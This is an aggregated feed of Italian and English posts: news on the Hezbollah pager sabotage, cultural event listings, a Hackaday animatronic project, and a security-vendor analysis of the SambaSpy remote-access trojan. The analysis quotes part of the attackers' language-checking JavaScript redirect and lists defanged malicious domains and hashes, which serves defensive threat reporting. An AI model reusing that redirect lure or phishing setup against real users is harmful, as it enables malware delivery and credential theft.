Secondo fonti di intelligence citate da Reuters, il Mossad avrebbe orchestrato un sabotaggio su larga scala inserendo esplosivi all’interno di migliaia di cercapersone ordinati da Hezbollah e fabbricati in Taiwan. Gli esplosivi sono stati inseriti durante la fase di produzione o di spedizione, rendendo i dispositivi quasi impossibili da distinguere dai normali cercapersone. Questi ordigni sarebbero stati progettati per detonare in risposta alla ricezione di specifici messaggi codificati inviati ai dispositivi.

Hezbollah aveva optato per l’utilizzo di cercapersone, in quanto considerati un’alternativa più sicura rispetto agli smartphone, ritenuti facilmente tracciabili dai servizi segreti israeliani. Tuttavia, questo incidente dimostra come anche tecnologie più semplici possano essere compromesse in maniera sofisticata. Il sabotaggio ha provocato un’esplosione simultanea dei dispositivi, causando un numero significativo di vittime, inclusi combattenti e affiliati del gruppo.

Una pianificazione da Stato


Le fonti vicine alla vicenda hanno riferito che il piano è stato attentamente orchestrato nei mesi precedenti, sfruttando l’ordinazione in blocco dei cercapersone da parte di Hezbollah. Questi dispositivi, prodotti dalla compagnia taiwanese Gold Apollo, erano destinati a migliorare la comunicazione tra i membri del gruppo, soprattutto in aree come Libano e Siria. Tuttavia, la loro alterazione a livello di produzione o spedizione ha trasformato questi strumenti di comunicazione in vere e proprie bombe a orologeria.

Gold Apollo ha negato qualsiasi coinvolgimento diretto nella manipolazione dei dispositivi, sottolineando che i cercapersone fabbricati erano stati venduti attraverso canali regolari e che non avevano il controllo su ciò che accadeva dopo la spedizione. L’azienda ha dichiarato di non essere responsabile per l’uso improprio dei suoi prodotti e ha puntato il dito verso la possibilità che i dispositivi siano stati sabotati durante il trasporto o in altre fasi della supply chain.

L’utilizzo del PETN


Questa operazione rappresenta un esempio clamoroso di attacco alla supply chain, in cui l’infiltrazione dei sistemi avviene prima che i dispositivi raggiungano i loro destinatari finali. L’uso di esplosivi miniaturizzati, come il PETN, inseriti all’interno dei vani batteria dei cercapersone, è stato identificato come la modalità principale con cui è stato attuato il sabotaggio. La possibilità che tali esplosivi possano essere detonati a distanza tramite un segnale radio codificato evidenzia l’elevato livello tecnologico raggiunto dall’intelligence israeliana.

La reazione di Hezbollah non si è fatta attendere: il gruppo ha subito accusato Israele di essere responsabile dell’attacco, e ha promesso vendetta. L’episodio ha inasprito ulteriormente le tensioni tra Israele e Hezbollah, rafforzando la percezione che il Mossad sia capace di colpire in profondità le infrastrutture e le comunicazioni del gruppo militante.

Questo scenario di sabotaggio tecnologico apre nuovi interrogativi sul futuro della sicurezza nelle comunicazioni per gruppi come Hezbollah, e pone l’accento sui rischi associati agli attacchi alla supply chain, una tecnica che sta diventando sempre più sofisticata e devastante. La vicenda potrebbe avere importanti implicazioni geopolitiche, non solo in Medio Oriente ma anche a livello internazionale, considerando l’utilizzo di tecnologie civili per fini militari.

L'articolo Supply Chain del Terrore! I Cercapersone Manomessi in fase di Produzione e Spedizione proviene da il blog della sicurezza informatica.



Some expertise on batteries and how that relates to the exploding pagers in Lebanon; an AI-powered surveillance dystopia that is already here; and how Snapchat reserves the right to serve you ads with your own AI likeness.#Podcast


#TuttiAScuola, riviviamo insieme la cerimonia di inaugurazione del nuovo anno scolastico che si è svolta lunedì #16settembre presso il Convitto Nazionale “Vittorio Emanuele II” di Cagliari.

🎥 Qui il video ▶ https://youtu.



The 30 new Commission initiatives to get Europe back in the tech game


Ursula von der Leyen’s commissioners-designate are to present 30 new strategies, acts, and initiatives to make Europe competitive and secure in tech.


euractiv.com/section/industria…



roma, 21 settembre, studio campo boario: presentazione del “libro della natura e del continuo”, di mario corticelli


slowforward.net/2024/09/18/rom…

un libro straordinario! non mancate!


sabato 21 settembre 2024, alle ore 18:00
presso lo Studio Campo Boario
viale del Campo Boario 4/a (metro Piramide), Roma

presentazione di
LIBRO DELLA NATURA E DEL CONTINUO
di MARIO CORTICELLI

edizioni déclic, 2024

dialoga con l’autore
Marco Giovenale


cliccare per ingrandire

evento facebook:
facebook.com/events/1255159909…

IL LIBRO
Con un titolo quasi secentesco, il libro della natura e del continuo funziona da prosecuzione di alcune ossessioni testuali di Mario Corticelli, già godibili nei suoi precedenti lavori: una su tutte quella per i fenomeni naturali e gli animali e il loro mondo, meticolosamente de-antropomorfizzato. Oppure il ricorso a un tagliente registro ironico, se non addirittura di scherzo-scherno, diretto tanto al contesto degli umani quanto agli scambi linguistici che questi istituiscono: «e poi si odono feste di mercato / con gioia di genti / nel crollo dei prezzi di mercato / con una qualche distruzione delle genti / perlunga la strada che è lucente / che bello che è il linguaggio delle genti / con una qualche distruzione del linguaggio».
Impossibile non vedere nell’intelligenza di simili soluzioni, e di tante altre nel libro, un segno di quella traccia caustica beffarda e insieme paradossalmente leggera – di cui Corticelli è erede/innovatore – che rimonta al nome di Corrado Costa: «petizione per la diffusione dei boschi anche nelle foreste / petizione per la diffusione dei pini anche negli abeti dei boschi / petizione per la diffusione degli aghi anche negli aghi».
In definitiva, questo De rerum natura giocosissimo – che sposta sempre di lato, in un angolo bizzarro e in nuovi inciampi il caosmos che descrive – si disimpegna dal ruolo di riprodurre paesaggi, bestie, regole, mappe e tassonomie, e semmai disorienta con gran gusto quel che pensavamo essere una stabile visione delle cose, talvolta disturbando le immagini naturali come farebbe un programma di intelligenza artificiale: «un cervo. presenta un eccesso di denti che gli sporgono dai fianchi e dal dorso, che ce lo fanno immaginare già mangiato dall’interno, morto tuttavia chi lo ha mangiato. nei pressi di un burrone, esterno».

L’AUTORE
Mario Corticelli ha pubblicato testi poetici nelle antologie RZZZZZ! (Transeuropa Edizioni) e Àkusma (Metauro Edizioni) e su numerose riviste, fra cui Versodove, Nioques, OEI. Un modo (gammm.org) è del 2011. Tra il 2014 e il 2015 sono usciti due libri e un ebook legati in una trilogia aperta: Aria (comunione) (IkonaLíber, 2014), la sezione aria della serie mille idilli (gammm.org, 2014) e Costruzione di un animale (Arcipelago Edizioni, 2015). Del 2018 è Qualche parte del cane (Tic Edizioni). Su gammm.org e su pontebianco.noblogs.org è possibile leggere prose da sottrarre il bambino (2024).

declicedizioni.it/prodotto/lib…

slowforward.net/2024/09/18/rom…

#000000 #999999 #CorradoCosta #Corticelli #déclic #ironia #LibroDellaNaturaEDelContinuo #MarioCorticelli #poesia #prosa #ProsaInProsa







Bringing the Horror of Seaman into the Real World


20259064

A little under 25 years ago, a particularly bizarre game was released for Sega’s Dreamcast. In actually, calling it a “game” might be something of a stretch. It was more of a pet simulator, where you need to feed and care for a virtual animal as it grows. Except rather than something like a dog or a rabbit, your pet is a talking fish with a human face that doesn’t seem to like you very much. Oh, and Leonard Nimoy is there too for some reason.

Most people in the world don’t even know this game ever existed, and frankly, their lives are all the better for it. But for those who lovingly cared for (or intentionally killed) one of these rude creatures back in the early 2000s, it’s an experience that sticks with you. Which we assume is why [Robert Prest] decided to build this incredibly faithful physical recreation of Seaman.

The creature itself is a wireless animatronic that’s been fitted with several servos to operate not just its creepy human mouth, but its flippers, legs, and tail. [Robert] pulled the original speech clips from the game, and recreated most of the voice recognition prompts so he can converse with his pet monster. A Dreamcast controller is used to interact with the robo-seaman, but even that’s a bit of a hack. It’s actually just the shell of the controller which has been filled with new hardware, namely an ESP8266 and Nokia LCD that take the place of the original Visual Memory Unit (VMU).

20259066

[Robert] went the extra mile and also recreated the tank the creature lives in. The front glass is actually a transparent display that can show game information or “water”, and there’s sonar sensors that can detect when somebody has reached into it. The original game’s interactive elements involved adjusting the temperature of the tank and feeding your growing abomination, which are represented in this physical incarnation. There’s even little 3D printed versions of the bugs (which incidentally also have human faces) raise as food for the creature.

While this might not be our ideal office decoration, but we’ve got to hand it to [Robert], he did a hell of job bringing Seaman to life. Now let’s just hope it doesn’t escape its tank and get into the wild.

youtube.com/embed/-HH8HnN_mB4?…


hackaday.com/2024/09/18/bringi…





21 settembre, roma: equinozio @ csoa la torre


slowforward.net/2024/09/16/21-…


*EQUINOX*
Aprono il Techno Party
degli _Space Invaders:_

*Poeti del Parco* [P.d.P.]
& *Monia Steri*
& *Matilde Vellucci*

and Mad Performers

Equinozio d’autunno, h. 22
C.s.o.a LA TORRE
Via Bertero,13
Roma

tutte le info qui:
facebook.com/events/s/space-eq…

slowforward.net/2024/09/16/21-…

#000000 #csoaLaTorre #equinox #LaTorre #MadPerformers #MatildeVellucci #MoniaSteri #poetiDelParco #spaceInvaders #techno #TechnoParty





War on terror e politica estera americana oggi. Un dibattito ampio

@Notizie dall'Italia e dal mondo

[quote]Conoscere ed analizzare il dibattito negli Stati Uniti attorno alla “War on Terror” bushiana contro il terrorismo islamico significa comprendere la postura di Washington in politica estera oggi. Inutile negare che le guerre in Iraq ed Afghanistan abbiano lasciato uno strascico di profonda divisione in seno



Vadda Ghalughara: l’Olocausto dei Sikh

@Arte e Cultura

[quote]Introduzione Nel cuore del XVIII secolo, il Punjab vive un periodo di profonde trasformazioni. Le pianure fertili, attraversate dai cinque fiumi che danno nome alla regione, sono il teatro di conflitti tra potenze emergenti eContinue reading
The post



Cercapersone come bombe, il blitz di Israele contro Hezbollah che può allargare la guerra


20251714

L’esplosione di oltre un migliaio di cercapersone di membri di Hezbollah e di altri esponenti di istituzioni e apparati legati all’Iran nella giornata odierna a seguito di un’azione con ogni probabilità di stampo israeliana ha suscitato clamore e scalpore. Un’esplosione simultanea di un numero così ampio di dispositivi, che ha causato 1.200 feriti in Libano, […]
Continua a leggere

The post Cercapersone come bombe, il blitz di Israele contro Hezbollah che può allargare la guerra appeared first on InsideOver.



Exotic SambaSpy is now dancing with Italian users


20251647

Introduction


In May 2024, we detected a campaign exclusively targeting victims in Italy. We were rather surprised by this, as cybercriminals typically select a broader target to maximize their profits. For example, a certain type of malware might target users in France and Spain, with the phishing emails written in both of the respective languages. However, for such a campaign, the malware’s code includes no particular checks to ensure it only runs in France and Spain. What sets this campaign apart is that, at various stages of the infection chain, checks are made to ensure that only Italian users are infected. This prompted us to investigate further and discover that the attackers were delivering a new RAT as the final payload that we dubbed SambaSpy.

Infection chain


When we started our investigation, we discovered two (slightly) different infection chains, as can be seen in the two figures below.

SambaSpy infection chain 1
SambaSpy infection chain 1

SambaSpy infection chain 2
SambaSpy infection chain 2

Let’s discuss the second case in more detail as that infection chain is more elaborate. First, the victim receives an email from a German email address. The email was, however, written in Italian and looked like it came from a legitimate Italian real estate company.

20251649

The email urges the receiver to view an invoice by clicking on an embedded link. Then the user is redirected to a malicious website which, during our analysis and according to other open sources, redirects to FattureInCloud, a legitimate Italian cloud solution used to store and manage digital invoices and quotes, where a legitimate invoice is displayed. Unfortunately, we were unable to view this file directly. Luckily, we found such an invoice on the urlscan.io website as can be seen in the figure below.

20251651

Note that all the distribution campaigns seem to be designed around this legitimate invoice. We observed a variety of the malicious emails and in all of them, the sender, subjects, and content took advantage of the brand of the company that generated the invoice. Moreover, the attacker registered more than a dozen of malicious domains under the company’s name:

belliniepecuniaimmobili[.]com
immobilibelliniepecunia[.]xyz
immobilibelliniepecunia[.]online
immobilibelliniepecunia[.]site
bpecuniaimmobili[.]online
bpecuniaimmobili[.]info
belliniepecuniaimmobilisrl[.]shop
belliniepecuniaimmobilisrl[.]online
belliniepecuniaimmobilisrl[.]xyz
belliniepecuniaimmobili.com[.]br
bpecuniaimmobili[.]xyz
immobilibelliniepecunia[.]shop
immobilibelliniepecunia[.]me
immobiliarebelliniepecunia[.]info
immobiliarebelliniepecunia[.]online

Getting redirected to a legitimate resource seemed like a dead end but our telemetry provided information that some users were redirected by the same URL to a malicious web server running behind ngrok. This server provided an HTML page containing JS code with comments in Brazilian Portuguese. It redirects users to a malicious OneDrive URL but only if they are running Edge, Firefox, or Chrome with their language set to Italian. If the users don’t pass these checks, they stay on the page.
<title> FATTURA </title>
<script>
window.onload = function() {
var language = navigator.language || navigator.userLanguage;

if (language.startsWith("it")) {
var userAgent = navigator.userAgent.toLowerCase();
var browser;

if (userAgent.includes("edg")) {
browser = "Edge";
} else if (userAgent.includes("firefox")) {
browser = "Firefox";
} else if (userAgent.includes("chrome")) {
browser = "Chrome";
} else {
// Navegador desconhecido, pode lidar com isso de acordo com sua lógica
return;
}

switch (browser) {
case "Edge":
window.location.href = "hxxps://1drv.ms/b/s!AnMKZoF8QfODa92x201yr0GDysk?e=ZnX3Rm";
Users that match the target end up at a PDF document hosted on Microsoft OneDrive, luring the user to click on a hyperlink with the text “VISUALIZZA DOCUMENTO”, meaning “view document.” Finally, the URL redirects to a malicious JAR file hosted on MediaFire, which is either a dropper or a downloader.

The downloader


The downloader runs some checks to see whether or not it is running in a VM.It then checks that the environment is set to Italian again and if not, exits. If all the checks are passed, the downloader downloads the final stage and executes it.

20251653

The dropper


The dropper does exactly the same thing as a downloader besides downloading the malware, as it is embedded inside the resources of the JAR file.

SambaSpy


SambaSpy is a full-featured RAT developed in Java and obfuscated using the Zelix KlassMaster protector. The strings are encrypted and class names and methods are obfuscated to prevent analysis and detection. The malware exhibits a wide range of functionalities. Below, we provided a partial description. For the full report, please contact us.

The many malware’s features include:

  • File system management;
  • Process management;
  • Uploading/downloading files;
  • Webcam control;
  • Logging keystrokes and controlling the clipboard;
  • Grabbing screenshots;
  • Remote desktop management;
  • Password stealing;
  • Loading additional plugins at runtime;
  • Starting a remote shell;
  • Interacting with the victim;

Let’s look at some of these in more detail:

Loading plugins


The plugin loading mechanism is fairly simple. A class is supplied to the RAT and loaded using URLClassLoader to open a file on the disk previously downloaded by the RAT. It then invokes the addURL() method in the loaded class. See the figure below for the complete code.

20251655

Logging keystrokes and clipboard


SambaSpy uses the JNativeHook library to log every keystroke from the victim. Then, upon key release, each keystroke event is sent to the C2. It also uses Java Abstract Window native libraries to steal or modify the victim’s clipboard content.

Stealing browser credentials


The RAT can steal credentials from major browsers including Chrome, Edge, Opera, Brave, Iridium and Vivaldi.

20251657

Remote desktop control


SambaSpy implements a custom remote control system. It uses the Java Abstract Window library’s Robot class to control the mouse and keyboard from the system, along with the GraphicsDevice class to provide a screen display under the attacker’s control.

Who is behind the campaign?


We have yet to correlate the attackers behind this campaign to known actors. Nevertheless, there are indications that the threat actor speaks Brazilian Portuguese.

The language found in the malicious artifacts (i.e., code comments and error messages), and in the various sites utilized by the threat actor, was identified as Brazilian Portuguese as it features words not used in other dialects of the language.

20251660

We also know that the attacker is not exclusively interested in Italian targets, but has extended their activities to Spain and Brazil. During our investigation, we discovered other malicious domains attributed to the same attacker used in other campaigns. However, the infection chain involving these domains doesn’t include any language checks similar to those we observed in the Italian campaign.

20251662

The domains were attributed to the same attacker because they were used to manage or distribute other variants of the downloader observed in Italy.

Conclusion


There are several interesting aspects to this campaign. First, this campaign specifically targeted Italians by ensuring at multiple stages of the infection process that Italian was set as the language of the victim’s system. Second, there are various connections with Brazil, such as language artifacts in the code and domains targeting Brazilian users. This aligns with the fact that attackers from Latin America often target European countries with closely related languages, namely Italy, Spain, and Portugal.

Third, it is interesting to observe how the attackers based their distribution campaign on a legitimate document shared online, taking advantage of the brand of the company that generated the document. It is important to highlight that the company is completely unrelated to the campaign, as they are not directly involved in sending the messages or distributing the malware. They do not even appear to have published the invoice. Rather a customer presumably did so.

The attacker behind this campaign continuously changes its obfuscation methods, phishing emails, and C2 endpoints. Nevertheless, they reuse infrastructure-related second-level domains by creating new subdomains, which gives us a better overview of the attacker. This information can be used in future attribution efforts, while enhancing malware detection.

If you would like to stay up to date on the latest TTPs that criminals are using, or if you have questions about our private reports, contact us at crimewareintel@kaspersky.com.

Indicators of compromise


e6be6bc2f8e27631a7bfd2e3f06494aa Malicious PDF
1ec21bd711b491ad47d5c2ef71ff1a10 Downloader
d153006e00884edf7d48b9fe05d83cb4 Dropper
0f3b46d496bbf47e8a2485f794132b48 SambaSpy

Domain names embedded in email messages
officediraccoltaanabelacosta[.]net
belliniepecuniaimmobili[.]com
immobilibelliniepecunia[.]xyz
immobilibelliniepecunia[.]online
immobilibelliniepecunia[.]site
bpecuniaimmobili[.]online
bpecuniaimmobili[.]info
belliniepecuniaimmobilisrl[.]shop
belliniepecuniaimmobilisrl[.]online
belliniepecuniaimmobilisrl[.]xyz
belliniepecuniaimmobili.com[.]br
bpecuniaimmobili[.]xyz
immobilibelliniepecunia[.]shop
immobilibelliniepecunia[.]me
immobiliarebelliniepecunia[.]info
immobiliarebelliniepecunia[.]online

Domain names used to distribute malware
lamsnajs[.]site
appsabs[.]site
qpps[.]site
lskbd[.]site
serverakp[.]site
wedmail[.]site

66d68ce73c83226a.ngrok[.]app
hxxps://1drv[.]ms/b/s!AnMKZoF8QfODa92x201yr0GDysk?e=ZnX3Rm PDF hosted on OneDrive
hxxps://moduloj.lamsnajs[.]site/Modulo32.jpg URL embedded in downloader


securelist.com/sambaspy-rat-ta…



Operation Kraken is a sign that organized criminals are moving away from larger encrypted phone companies to a decentralized collection of smaller players and consumer access apps that the rest of us use.#News #Crime